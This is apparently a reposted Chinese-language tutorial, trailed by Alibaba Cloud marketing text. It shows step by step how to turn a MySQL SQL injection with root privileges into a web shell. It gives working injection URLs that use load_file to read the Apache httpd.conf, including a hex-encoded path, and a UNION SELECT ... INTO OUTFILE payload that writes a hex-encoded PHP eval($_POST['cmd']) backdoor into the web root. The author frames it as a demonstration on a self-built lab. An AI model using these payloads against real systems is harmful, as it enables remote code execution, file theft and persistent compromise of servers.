標籤:
首先我們的找到一個有注入的站:這裡我用自己搭建的環境表示;大家不要亂來
http://localhost/pentest/sql/sql_injection_get.php?id=1
發現是root許可權,我們嘗試直接寫馬
首先要找到網站的主目錄:
資料庫目錄:D:\wamp\bin\mysql\mysql5.5.20\data\
進行判斷,伺服器可能為wampserver簡易版,httpd.conf檔案在D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf
http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,3 load_file(‘D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf‘) from user--+
如果這樣不成功,建議將目錄轉換為hex編碼進行:即 load_file(0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)
找到了網站目錄:D:/wamp/www
我們嘗試寫:
http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E into outfile ‘D:/wamp/www/xx.php‘ from user --+
<?php eval($_POST[‘cmd‘]);?>的hex編碼:0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E
然後訪問:http://localhost/xx.php
Mysql注入root許可權直接寫一句話馬
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
